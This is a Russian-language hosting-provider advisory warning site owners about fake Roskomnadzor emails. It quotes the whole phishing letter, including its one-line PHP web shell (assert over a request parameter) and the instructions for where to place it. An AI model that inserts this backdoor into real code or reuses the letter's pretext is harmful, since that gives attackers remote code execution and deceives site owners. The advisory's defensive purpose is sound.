Внимание владельцам сайтов: это не Роскомнадзор

Многие владельцы сайтов получают сообщения якобы от Роскомнадзора с требованием внести изменения на хостинге и разместить PHP-код для «идентификации». Будьте внимательны!

Роскомнадзор — Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций. Эта организация занимается в частности контролем и надзором в сфере средств массовой информации, в том числе электронных, и массовых коммуникаций, информационных технологий и связи, что относится и к сайтам.

Накануне многие пользователи получили письмо от zapret-info@roskomnadzor.org с требованиями о внесении изменении в код сайта якобы для подтверждения принадлежности.

Домен отправителя roskomnadzor.org переадресует на сайт Роскомнадзора, тем не менее, сам домен зарегистрирован на неизвестное лицо 19 августа этого года, а перенаправление осуществляется путём редиректа. К официальным ресурсам этот домен никакого отношения не имеет. Впрочем, при отправке можно указать любой почтовый адрес отправителя, даже в реально существующем домене государственной организации. Поэтому к письмам по электронной почте, не содержащим достоверной электронно-цифровой подписи надо относиться с осторожностью.

В письме есть требование разместить PHP-код

assert(stripslashes($_REQUEST[roskomnadzor]));

Функция assert() выполнит PHP-код, переданный в адресной строке при вызове скрипта. Другими словами злоумышленник таким образом получает возможность на практически любые действия с вашей площадкой сайта. Разумеется, это обманное письмо, фейк, и подобные требования ни в коем случае выполнять нельзя.

В случае, если у вас есть сомнения относительно сообщений, касающихся вашего сайта на хостинге, пожалуйста, свяжитесь с нами и не совершайте необдуманных действий.

Приводим текст письма.

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени *** в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт *** был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени ***, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr

2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени *** */
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: ***/reestr/reestr-id128032.php
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.null

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ***, следую инструкции указанной выше, то Ваш сайт *** будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------

Вам также может помочь